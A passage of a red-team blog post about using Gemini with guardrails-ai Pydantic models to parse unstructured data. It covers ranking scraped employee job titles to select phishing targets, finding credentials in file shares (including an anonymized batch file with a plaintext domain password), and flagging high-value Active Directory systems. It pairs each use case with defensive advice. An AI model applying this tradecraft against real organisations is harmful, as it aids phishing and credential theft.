We will showcase the lessons learned and key takeaways for all organizations and highlight other problems that can be solved with this approach for both red and blue teams.</span></p> <h2><span style="vertical-align: baseline;">Approach</span></h2> <p><span style="vertical-align: baseline;">Data parsing and understanding is one of the biggest early benefits of AI. We have seen many situations where AI can help process data at a fast rate. Throughout this post, we use an LLM to process unstructured data, meaning that the data did not have a structure or format that we knew about before parsing it.</span></p> <p><span style="vertical-align: baseline;">If you want to try these examples out yourself, please make sure you either use a local model or have permission to send the data to an external service.</span></p> <h3><span style="vertical-align: baseline;">Getting Structured Data Out of an LLM</span></h3> <p><span style="vertical-align: baseline;">Step one is to get the data into a format we can use. If you have ever used an LLM, you will have noticed that it outputs a story or prose text, especially if you use chat-based versions. For a lot of use cases, this is fine; however, we want to analyze the data and get structured data. Thus, the first problem we have to solve is to get the LLM to output the data in a format we can specify. The simple method is to ask the LLM to output the data in a machine-readable format like JSON, XML, or CSV. However, you will quickly notice that you have to be quite specific about the data format, and the LLM can easily output data in another format, ignoring your instructions.</span></p> <p><span style="vertical-align: baseline;">Luckily for us, other people have encountered this problem and have solved it with something called Guardrails. 
One of the projects we have found is called </span><a href="https://github.com/guardrails-ai/guardrails" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">guardrails-ai</span></a><span style="vertical-align: baseline;">. It is a Python library that allows you to create guardrails—specific requirements—for a model based on Pydantic.</span></p> <p><span style="vertical-align: baseline;">To illustrate, take a simple Python class from the documentation that validates a pet description from the output of the LLM:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>from pydantic import BaseModel, Field

class Pet(BaseModel):
    pet_type: str = Field(description="Species of pet")
    name: str = Field(description="a unique pet name")</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">You can use the following code from the Guardrails documentation to process the output of the LLM into a structured object:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>from guardrails import Guard
import openai

prompt = """
What kind of pet should I get and what should I name it?

${gr.complete_json_suffix_v2}
"""

guard = Guard.from_pydantic(output_class=Pet, prompt=prompt)

raw_output, validated_output, *rest = guard(
    llm_api=openai.completions.create,
    engine="gpt-3.5-turbo-instruct"
)

print(validated_output)</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">If we look at what this library generates under the hood for this prompt, we see that it adds a structured-output section with instructions for the LLM to output data in a specific way. 
This streamlines the way you can get structured data from an LLM.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ai-adversarial-emulation-fig1.max-1000x1000.png" alt="The generated prompt from the Pydantic model"> </a> <figcaption class="article-image__caption "><p data-block-key="cz2wg">Figure 1: The generated prompt from the Pydantic model</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">For the next use case, we will show the Pydantic models we've created to process the output.</span></p> <h2><span style="vertical-align: baseline;">Red Team Use Cases</span></h2> <p><span style="vertical-align: baseline;">The next sections contain some use cases where we can use an LLM to get structured data out of data obtained. 
The use cases are divided into three categories of the attack lifecycle: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Initial Reconnaissance</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Escalate Privileges</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Internal Reconnaissance</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ai-adversarial-emulation-fig2.max-1000x1000.png" alt="Attack lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="5hgue">Figure 2: Attack lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Initial Reconnaissance</span></h2> <p><span style="vertical-align: baseline;">Open Source Intelligence (OSINT) is an important part of red teaming. It includes gathering data about the target organization from news articles, social media, and corporate reports.</span></p> <p><span style="vertical-align: baseline;">This information can then be used in other red team phases such as during phishing. For defenders, it helps them understand which parts of their organization are exposed to the internet, anticipating a possible future attack. 
In the next use case, we discuss processing social media information to classify roles and extract useful information.</span></p> <h3><span style="vertical-align: baseline;">Use Case 1: Social Media Job Functions Information</span></h3> <p><span style="vertical-align: baseline;">During OSINT, we often try to get information from employees about their function in their company. This helps with performing phishing attacks, as we do not want to target IT professionals, especially those who work in cybersecurity.</span></p> <p><span style="vertical-align: baseline;">Social media sites allow their users to write about their job titles in a free format. This means that the information is unstructured and can be written in any language and any format.</span></p> <p><span style="vertical-align: baseline;">We can try to extract the information from the title with simple string matches; however, because the users can fill in anything in any language, this problem can be better solved with an LLM.</span></p> <h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">First, we create a Pydantic model for the Guardrail:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-markup"><code>class RoleOutput(BaseModel):
    role: str = Field(description="Role being analyzed")
    it: bool = Field(description="The role is related to IT")
    cybersecurity: bool = Field(description="The role is related to CyberSecurity")
    experience_level: str = Field(
        description="Experience level of the role.",
    )</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This model has two Boolean fields indicating whether the role is IT or cybersecurity related. 
Additionally, we would like to know the experience level of the role.</span></p> <h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">Next, let's create a prompt to instruct the LLM to extract the requested information from the role. This prompt is quite simple and just asks the LLM to fill in the data.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the following role, answer the following questions. If the answer doesn't exist in the role, enter ``.

${role}

${gr.complete_xml_suffix_v2}</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The last two lines are placeholders used by guardrails-ai.</span></p> <h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">To test the model, we scraped the job titles that employees use on social media; this dataset contained 235 entries.</span><span style="vertical-align: baseline;"> For testing, we used the gemini-1.0-pro model.</span></p> <p><span style="vertical-align: baseline;"><a href="https://deepmind.google/technologies/gemini/" rel="noopener" target="_blank">Gemini</a> managed to parse 232 entries. 
The results are shown in Table 1.</span></p></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong><span style="vertical-align: baseline;">Not IT</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong><span style="vertical-align: baseline;">IT</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong><span style="vertical-align: 
baseline;">Cybersecurity</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Gemini</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">183</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">49</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">5</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Manual evaluation <br/></span><span style="vertical-align: baseline;">by a red team operator</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">185</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">47</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">5</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">False positive</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">1</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">3</span></p> </td> <td 
style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">0</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 1: Results of Gemini parsing 232 job title entries</span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In the end, Gemini processed the roles roughly on par with a human. Most of the false positives were debatable, as it was not clear whether the role was actually IT related. The experience level field did not perform well, as the model labeled the experience level as "unknown" or "none" for most of the entries. To resolve this issue, the field was changed so that the experience level is a number from 1 to 10. Running the analysis again yielded better results for the experience level. The lowest experience levels (1–4) contained function titles like "intern," "specialist," or "assistant." This usually indicated that the person had been employed in that role for a shorter period of time. The updated data model is shown as follows:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>class RoleOutput(BaseModel):
    role: str = Field(description="Role being analyzed")
    it: bool = Field(description="The role is related to IT")
    cybersecurity: bool = Field(description="The role is related to CyberSecurity")
    experience_level: int = Field(
        description="Estimate of the experience level of the role on a scale of 1-10. Where 1 is low experience and 10 is high.",
    )</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This approach helped us to sort through a large dataset of phishing targets by identifying employees that did not have IT and cybersecurity roles, and sorting them by experience level. This can speed up target selection for large organizations and may allow us to better emulate attackers by changing the prompts or selection criteria. Defending against this kind of analysis is more difficult. In theory, you can instruct all your employees to include "Cybersecurity" in their role, but that does not scale well or solve the underlying phishing problem. The best approach with regards to phishing is, in our experience, to invest in phishing-resistant multifactor authentication (MFA) and application allowlisting. If applied well, these solutions can mitigate phishing attacks as an initial access vector.</span></p> <h2><span style="vertical-align: baseline;">Escalate Privileges</span></h2> <p><span style="vertical-align: baseline;">Once attackers establish a foothold in an organization, one of their first acts is often to improve their level of access or control through privilege escalation. There are quite a few methods that can be used for this. 
These range from local, system-based techniques to wider domain-wide ones; some rely on exploits or misconfigurations, and others on finding sensitive information while searching through files.</span></p> <p><span style="vertical-align: baseline;">Our focus will be on the final category, which aligns with our challenge of identifying the desired information within the vast amount of data, like finding a needle in a haystack.</span></p> <h3><span style="vertical-align: baseline;">Use Case 2: Credentials in Files</span></h3> <p><span style="vertical-align: baseline;">After gaining initial access to the target network, one of the more common enumeration methods employed by attackers is to enumerate file shares and try to locate interesting files. There are quite a few tools that can do this, such as </span><a href="https://github.com/SnaffCon/Snaffler" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Snaffler</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">After you identify files that potentially contain credentials, you can go through them manually to find useful ones. However, if you do this in a large organization, there is a chance that you will have hundreds to thousands of hits. In that case, some tools can help with finding and classifying credentials, such as </span><a href="https://github.com/trufflesecurity/trufflehog" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">TruffleHog</span></a><span style="vertical-align: baseline;"> and </span><a href="https://github.com/praetorian-inc/noseyparker" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Nosey Parker</span></a><span style="vertical-align: baseline;">. 
Additionally, the Python library </span><a href="https://github.com/Yelp/detect-secrets" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">detect-secrets</span></a><span style="vertical-align: baseline;"> can help with this task. </span></p> <p><span style="vertical-align: baseline;">Most of these tools look for common patterns or file types that they understand. To cover unknown file types or credentials in emails or other formats, it might instead be valuable to use an LLM to analyze the files to find any unknown or unrecognized formats.</span></p> <p><span style="vertical-align: baseline;">Technically, we can just run all tools and use a linear regression model to combine the results into one. </span><span style="vertical-align: baseline;">An anonymized example of a file with a password that we encountered during our tests is shown as follows:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>@Echo Off
Net Use /Del * /Yes
Set /p Path=&lt;"path.txt"
Net Use %Path% Welcome01@ /User:CHAOS.LOCAL\WorkstationAdmin
If Not Exist "C:\Data" MKDIR "C:\Data"
Copy %Path%\. C:\Data
Timeout 02</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">We used the following Python classes to instruct Gemini to retrieve credentials with an optional domain. 
One file can contain multiple credentials, so we use a list of credentials, which lets Gemini return several credentials from a single file.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Imports needed to run this snippet on its own
from typing import Optional

from pydantic import BaseModel, Field


class Credential(BaseModel):
    password: str = Field(description="Potential password of an account")
    username: str = Field(description="Potential username of an account")
    domain: Optional[str] = Field(
        description="Optional domain of an account", default=""
    )


class ListOfCredentials(BaseModel):
    credentials: list[Credential] = []</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">In the prompt, we give some examples of what kind of systems we are looking for, and output into JSON once again:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the following file, check if there are credentials in the file. Only include results if there is at least one username and password. If the domain doesn't exist in the file, enter `` as a default value.

${file}

${gr.complete_xml_suffix_v2}</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">We tested on 600 files, where 304 contain credentials and 296 do not. Testing occurred with the gemini-1.5 model. Each file took about five seconds to process.</span></p> <p><span style="vertical-align: baseline;">To compare results with other tools, we also tested Nosey Parker and TruffleHog. Both Nosey Parker and TruffleHog are made to find credentials in a structured way in files, including repositories. 
Their use case is usually for known file formats and randomly structured files.</span></p> <p><span style="vertical-align: baseline;">The results are summarized in Table 2.</span></p></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Tool</span></strong></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">True Negative</span></strong></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">False Positive</span></strong></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: 
baseline;">False Negative</span></strong></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">True Positive</span></strong></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Nosey Parker</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">284 (47%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">12 (2%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">136 (23%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">168 (28%)</span></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TruffleHog</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">294 (49%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">2 (&lt;1%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">180 (30%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">124 (21%)</span></p> </td> </tr> <tr> <td style="vertical-align: 
bottom; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Gemini</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">278 (46%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">18 (3%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">23 (4%)</span></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">281 (47%)</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: Results of testing for credentials in files, where 304 contain them and 296 do not</span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In this context, the definitions of true negative, false positive, false negative, and true positive are as follows:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">True Negative</strong><span style="vertical-align: baseline;">: A file does not contain any credentials, and the tool correctly indicates that there are no credentials.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">False Positive</strong><span style="vertical-align: baseline;">: The tool incorrectly indicates that a file contains credentials when it does 
not.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">False Negative</strong><span style="vertical-align: baseline;">: The tool incorrectly indicates that a file does not contain any credentials when it does.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">True Positive</strong><span style="vertical-align: baseline;">: The tool correctly indicates that a file contains credentials.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">In conclusion, Gemini finds the most files with credentials, at the cost of a slightly higher false positive rate. TruffleHog has the lowest false positive rate, but also finds the fewest true positives. This is to be expected, as a higher true positive rate is usually accompanied by a higher false positive rate. The current dataset has almost an equal number of files with and without credentials—in real-world scenarios this ratio can differ wildly, which means that the false positive rate is still important even though the percentages are quite close.</span></p> <p><span style="vertical-align: baseline;">To optimize this approach, you can use all three tools, combine their output signals into a single signal, and then sort the candidate files based on this combined signal.</span></p> <p><span style="vertical-align: baseline;">Defenders can, and should, use the same techniques previously described to enumerate the internal file shares and remove or limit access to files that contain credentials. 
Make sure to check what file shares each server and workstation exposes to the network, because in some cases file shares are exposed accidentally or were forgotten about.</span></p> <h2><span style="vertical-align: baseline;">Internal Reconnaissance</span></h2> <p><span style="vertical-align: baseline;">When attackers have gained a better position in the network, the next step in their playbooks is understanding the domain in which they have landed so they can construct a path to their ultimate goal. This could be full domain control or access to specific systems or users, depending on the threat actor's mission. From a red team perspective, we need to be able to emulate this. From a defender's perspective, we need to find these paths before the attackers exploit them.</span></p> <p><span style="vertical-align: baseline;">The main tool that red teamers use to analyze Active Directory is </span><a href="https://github.com/BloodHoundAD/BloodHound" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">BloodHound</span></a><span style="vertical-align: baseline;">, which uses a graph database to find paths in the Active Directory. BloodHound is executed in two steps. First, an ingester retrieves the data from the target Active Directory. 
Second, this data is ingested and analyzed by BloodHound to find attack paths.</span></p> <p><span style="vertical-align: baseline;">Some tools that can gather data to be used in BloodHound are:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Sharphound</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Bloodhound.py</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Rusthound</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Adexplorer</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Bofhound</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Soaphound</span></p> </li> </ul> <p><span style="vertical-align: baseline;">These tools gather data from the Active Directory and other systems and output it in a format that BloodHound can read. In theory, if we have all the information about the network in the graph, then we can just query the graph to figure out how to achieve our objective.</span></p> <p><span style="vertical-align: baseline;">To improve the data in BloodHound, we have thought of additional use cases. Use Case 3 is about finding high-value systems. 
Discovering more hidden edges in BloodHound is part of Use Case 4 and Use Case 5.</span></p> <h3><span style="vertical-align: baseline;">Use Case 3: High-Value Target Detection in Active Directory</span></h3> <p><span style="vertical-align: baseline;">By default, BloodHound deems some groups and computers as high value. One of the main activities in internal reconnaissance is figuring out which systems in the client's network are high-value targets. Some examples of systems that we are interested in, and that can lead to domain compromise, are:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Backup systems</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SCCM</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Certificate services</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Exchange</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">WSUS systems</span></p> </li> </ul> <p><span style="vertical-align: baseline;">There are many ways to indicate which servers are used for a certain function, and it depends on how the IT administrators have configured it in their domain. There are some fields that may contain data in various forms to indicate what the system is used for. 
This is a prime example of unstructured data that might be analyzable with an LLM.</span></p> <p><span style="vertical-align: baseline;">The following fields in the Active Directory might contain the relevant information:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Name</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Samaccountname</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Description</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Distinguishedname</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SPNs</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">In the end, we would like to have a list of names of the systems the LLM has deemed high value. During development, we noticed that LLM results improved dramatically if you asked it to specify a reason. 
Thus, our Pydantic model looks like this:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>from pydantic import BaseModel, Field


class HighValueSystem(BaseModel):
    # One system the model considers high value, plus the model's justification.
    name: str = Field(description="Name of this system")
    reason: str = Field(description="Reason why this system is high value", default="")


class HighValueResults(BaseModel):
    # Container for the structured response: a list of high-value systems.
    systems: list[HighValueSystem] = Field(description="high value systems", default=[])</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">In the prompt, we give some examples of what kind of systems we are looking for:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the data, identify which systems are high value targets, look for: sccm servers, jump systems, certificate systems, backup systems and other valuable systems. Use the first (name) field to identify the systems.</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">We tested this prompt on a dataset of 400 systems and executed it five times. All systems were sent in one query to the model. To accommodate this, we used the gemini-1.5 model because it has a huge context window. 
Here are some examples of reasons Gemini provided, and what we think each reason was based on:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Domain controller</strong><span style="vertical-align: baseline;">: This appears to be based on the "OU=Domain Controllers" distinguishedname field of BloodHound</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Jumpbox</strong><span style="vertical-align: baseline;">: Based on the "OU=Jumpboxes,OU=Bastion Servers" distinguishedname</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Lansweeper</strong><span style="vertical-align: baseline;">: Based on the description field of the computer</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Backup Server</strong><span style="vertical-align: baseline;">: Based on "OU=Backup Servers" distinguishedname</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Some of the high-value targets are valid yet already known, like domain controllers. Others are good finds, like the jumpbox and backup servers. This method can process system names in other languages and more verbose descriptions of systems to identify systems that may be high value. Additionally, this method can be adapted to a more specific query—for example, one that might suit a different client environment:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the data, identify which systems are related to SWIFT. 
Use the first (name) field to identify the systems.</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In this case, the LLM will look for SWIFT servers and may save you some time searching for them manually. This approach can work even better when you combine this data with internal documentation, giving you results even if the Active Directory contains no information about how a system is used.</span></p> <p><span style="vertical-align: baseline;">For defenders, there are some ways to deal with this situation:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Limit the amount of information in the Active Directory and put the system descriptions in your documentation instead of within the Active Directory</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Limit the amount of information a regular user can retrieve from the Active Directory</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitor LDAP queries to see if a large amount of data is being retrieved from LDAP</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Use Case 4: User Clustering</span></h3> <p><span style="vertical-align: baseline;">After gaining an initial strong position, and understanding the systems in the network, attackers will often need to find the right users to compromise to gain further privileges in the domain. 
